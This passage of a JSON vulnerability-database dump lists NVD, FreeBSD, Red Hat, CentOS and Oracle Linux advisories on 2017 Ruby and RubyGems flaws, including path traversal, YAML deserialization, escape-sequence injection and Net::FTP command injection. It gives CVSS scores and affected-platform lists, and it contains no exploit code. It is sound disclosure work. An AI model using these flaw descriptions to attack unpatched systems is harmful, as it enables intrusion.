"cpe:2.3:a:ruby-lang:ruby:2.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-31T20:29:00", "title": "CVE-2017-0901", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0901"], "modified": "2019-10-09T23:21:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", 
"cpe:/a:rubygems:rubygems:2.6.12", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-0901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0901", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-31T20:29:00", "title": "CVE-2017-0900", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0900"], "modified": "2019-05-13T14:31:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:rubygems:rubygems:2.6.12", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-0900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-31T20:29:00", "title": "CVE-2017-0899", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0899"], "modified": "2019-10-09T23:21:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", 
"cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:rubygems:rubygems:2.6.12", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-0899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0899", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precision specifier (*) with a huge minus value. 
Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-09-15T19:29:00", "title": "CVE-2017-0898", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0898"], "modified": "2018-07-15T01:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/a:ruby-lang:ruby:2.2.5", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/a:ruby-lang:ruby:2.2.3", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/a:ruby-lang:ruby:2.2.1", "cpe:/a:ruby-lang:ruby:2.2.4", "cpe:/a:ruby-lang:ruby:2.2.0", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/a:ruby-lang:ruby:2.2.2", "cpe:/a:ruby-lang:ruby:2.2.6", "cpe:/a:ruby-lang:ruby:2.3.3"], "id": "CVE-2017-0898", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0898", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.5:*:*:*:*:*:*:*"]}], "freebsd": [{"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "description": "\nRuby blog:\n\nCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf\nIf a malicious format string which contains a precision specifier (*)\n\t is passed and a huge minus value is also passed to the specifier,\n\t buffer underrun may be caused. In such situation, the result may\n\t contain heap, or the Ruby interpreter may crash.\nCVE-2017-10784: Escape sequence injection vulnerability in the Basic\n\t authentication of WEBrick\nWhen using the Basic authentication of WEBrick, clients can pass an\n\t arbitrary string as the user name. 
WEBrick outputs the passed user name\n\t intact to its log, then an attacker can inject malicious escape\n\t sequences to the log and dangerous control characters may be executed\n\t on a victim\u2019s terminal emulator.\nThis vulnerability is similar to a vulnerability already fixed, but\n\t it had not been fixed in the Basic authentication.\nCVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode\nIf a malicious string is passed to the decode method of OpenSSL::ASN1,\n\t buffer underrun may be caused and the Ruby interpreter may crash.\nCVE-2017-14064: Heap exposure vulnerability in generating JSON\nThe generate method of JSON module optionally accepts an instance of\n\t JSON::Ext::Generator::State class. If a malicious instance is passed,\n\t the result may include contents of heap.\n\n", "edition": 5, "modified": "2017-09-14T00:00:00", "published": "2017-09-14T00:00:00", "id": "95B01379-9D52-11E7-A25C-471BAFC3262F", "href": "https://vuxml.freebsd.org/freebsd/95b01379-9d52-11e7-a25c-471bafc3262f.html", "title": "ruby -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:08", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14064"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby24-ruby (2.4.2). (BZ#1506785)\n\nSecurity Fix(es):\n\n* A buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. 
(CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\n* A vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. 
(CVE-2017-14064)", "modified": "2018-06-13T01:28:23", "published": "2017-12-19T13:13:07", "id": "RHSA-2017:3485", "href": "https://access.redhat.com/errata/RHSA-2017:3485", "type": "redhat", "title": "(RHSA-2017:3485) Moderate: rh-ruby24-ruby security, bug fix, and enhancement update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17790"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby23-ruby (2.3.6), rh-ruby23-rubygems (2.5.2.2), rh-ruby23-rubygem-json (1.8.3.1), rh-ruby23-rubygem-minitest (5.8.5), rh-ruby23-rubygem-psych (2.1.0.1). 
(BZ#1549649)\n\nSecurity Fix(es):\n\n* ruby: Command injection vulnerability in Net::FTP (CVE-2017-17405)\n\n* ruby: Buffer underrun vulnerability in Kernel.sprintf (CVE-2017-0898)\n\n* rubygems: Arbitrary file overwrite due to incorrect validation of specification name (CVE-2017-0901)\n\n* rubygems: DNS hijacking vulnerability (CVE-2017-0902)\n\n* rubygems: Unsafe object deserialization through YAML formatted gem specifications (CVE-2017-0903)\n\n* ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick (CVE-2017-10784)\n\n* ruby: Buffer underrun in OpenSSL ASN1 decode (CVE-2017-14033)\n\n* rubygems: Escape sequence in the \"summary\" field of gemspec (CVE-2017-0899)\n\n* rubygems: No size limit in summary length of gem spec (CVE-2017-0900)\n\n* ruby: Arbitrary heap exposure during a JSON.generate call (CVE-2017-14064)\n\n* ruby: Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code execution (CVE-2017-17790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-06-13T01:28:24", "published": "2018-03-26T13:13:23", "id": "RHSA-2018:0585", "href": "https://access.redhat.com/errata/RHSA-2018:0585", "type": "redhat", "title": "(RHSA-2018:0585) Important: rh-ruby23-ruby security, bug fix, and enhancement update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17790"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. 
It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. 
(CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\n\n* The \"lazy_initialize\" function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands. (CVE-2017-17790)", "modified": "2018-04-12T03:32:45", "published": "2018-02-28T21:24:33", "id": "RHSA-2018:0378", "href": "https://access.redhat.com/errata/RHSA-2018:0378", "type": "redhat", "title": "(RHSA-2018:0378) Important: ruby security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:19", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5147", "CVE-2015-7551", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17790"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby22-ruby (2.2.9), rh-ruby22-rubygems (2.4.5.4), rh-ruby22-rubygem-psych (2.0.8.1), rh-ruby22-rubygem-json (1.8.1.1). 
(BZ#1549646)\n\nSecurity Fix(es):\n\n* ruby: Command injection vulnerability in Net::FTP (CVE-2017-17405)\n\n* ruby: Buffer underrun vulnerability in Kernel.sprintf (CVE-2017-0898)\n\n* rubygems: Arbitrary file overwrite due to incorrect validation of specification name (CVE-2017-0901)\n\n* rubygems: DNS hijacking vulnerability (CVE-2017-0902)\n\n* rubygems: Unsafe object deserialization through YAML formatted gem specifications (CVE-2017-0903)\n\n* ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick (CVE-2017-10784)\n\n* ruby: Buffer underrun in OpenSSL ASN1 decode (CVE-2017-14033)\n\n* ruby: DL::dlopen could open a library with tainted library name (CVE-2009-5147, CVE-2015-7551)\n\n* rubygems: Escape sequence in the \"summary\" field of gemspec (CVE-2017-0899)\n\n* rubygems: No size limit in summary length of gem spec (CVE-2017-0900)\n\n* ruby: Arbitrary heap exposure during a JSON.generate call (CVE-2017-14064)\n\n* ruby: Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code execution (CVE-2017-17790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-06-13T01:28:16", "published": "2018-03-26T13:12:14", "id": "RHSA-2018:0583", "href": "https://access.redhat.com/errata/RHSA-2018:0583", "type": "redhat", "title": "(RHSA-2018:0583) Important: rh-ruby22-ruby security, bug fix, and enhancement update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:38:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "**CentOS Errata and Security Advisory** CESA-2018:0378\n\n\nRuby is an extensible, interpreted, object-oriented, 
scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. 
(CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\n\n* The \"lazy_initialize\" function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands. (CVE-2017-17790)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-March/034829.html\n\n**Affected packages:**\nruby\nruby-devel\nruby-doc\nruby-irb\nruby-libs\nruby-tcltk\nrubygem-bigdecimal\nrubygem-io-console\nrubygem-json\nrubygem-minitest\nrubygem-psych\nrubygem-rake\nrubygem-rdoc\nrubygems\nrubygems-devel\n\n**Upstream details at:**\n", "edition": 4, "modified": "2018-03-10T11:53:01", "published": "2018-03-10T11:53:01", "href": "http://lists.centos.org/pipermail/centos-announce/2018-March/034829.html", "id": "CESA-2018:0378", "type": "centos", "title": "ruby, rubygem, rubygems security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:10:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "[2.0.0.648-33]\n- Fix always passing WEBrick test.\n[2.0.0.648-32]\n- Add 
